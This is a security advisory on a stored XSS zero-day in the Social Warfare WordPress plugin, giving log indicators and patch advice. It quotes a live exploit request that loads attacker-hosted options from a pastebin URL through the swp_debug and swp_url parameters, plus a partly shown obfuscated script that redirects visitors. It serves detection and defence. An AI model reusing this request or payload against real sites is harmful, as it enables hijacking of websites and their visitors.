Zero-Day Stored XSS in Social Warfare

A zero-day vulnerability has just appeared in the WordPress plugin world, affecting over 70,000 sites using the Social Warfare plugin.

The plugin is vulnerable to a Stored XSS (Cross-Site Scripting) vulnerability and has been removed from the plugin repository. Attacks can be conducted by any users visiting the site.

A patch has been released and users are advised to update to version 3.5.3 as soon as possible.

What Is It All About?

The vulnerable code is contained within some of the plugins debugging features. These features aren’t directly used anywhere and rely on various $_GET parameters to be executed, which makes it easy to see if your site was attacked using this vulnerability.

A fully working PoC is available in the wild and we expect the number of exploit attempts to grow in size in the coming days.

Indicators of Compromise:

You can look for requests pointing to any PHP file /wp-admin/ with the following parameters in your access logs:

• swp_debug
• swp_url

Exploits in the wild

We are seeing a lot of exploit attempts in the wild from more than a hundred different IPs.

202.254.236.49 - - [21/Mar/2019:16:52:14 -0400] "GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=https://pastebin.com/raw/0yJzqbYf HTTP/1.1" 403 2669 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"

Sample Exploitation Attempt

The attackers are injecting rogue javascript scripts by loading the following url https://pastebin.com/raw/0yJzqbYf, which contains this malicious payload:

'twitter_id' => '"><script language=javascript>eval(String .fromCharCode(118, 97, 114, 32, 108, 108, 116, 32, 61, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 115, 101, 116, 102, 111, 114, 99, 111, 110, 102, 105, 103, 112, 108, 101, 97, 115, 101, 46, 99, 111, 109, 47, 119, 101, ...skipped... 110, 46, 104, 114, 101, 102, 61, 108, 108, 116, 32, 59, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 102, 61, 108, 108, 116, 59));</script>',

Sample payload used by the attackers

This script redirects the user to another malicious site.

In Conclusion

Cross-site scripting (XSS) is a widespread vulnerability that allows an attacker to inject malicious content into a site. This forces a victim’s browser to execute code as the page is loaded and perform actions in the browser on behalf of the website.

In the case of Stored XSS as seen with the Social Warfare vulnerability, the payload gets stored in the site’s database and retrieved with every page request. If left unpatched, it can be very dangerous, as it gives an attacker almost complete control of the browser environment.

Unauthenticated attacks are very serious because they can be automated — this makes it easy for hackers to mount successful, widespread attacks against vulnerable websites. The number of active installs, the ease of exploitation, and the effects of a successful attack are what makes this vulnerability particularly dangerous.

To protect against this vulnerability, we strongly encourage Social Warfare users to update their plugin to version 3.5.3 as soon as possible. In the event that you can’t update right away, you can leverage the Sucuri Firewall or equivalent technology to virtually patch the vulnerability.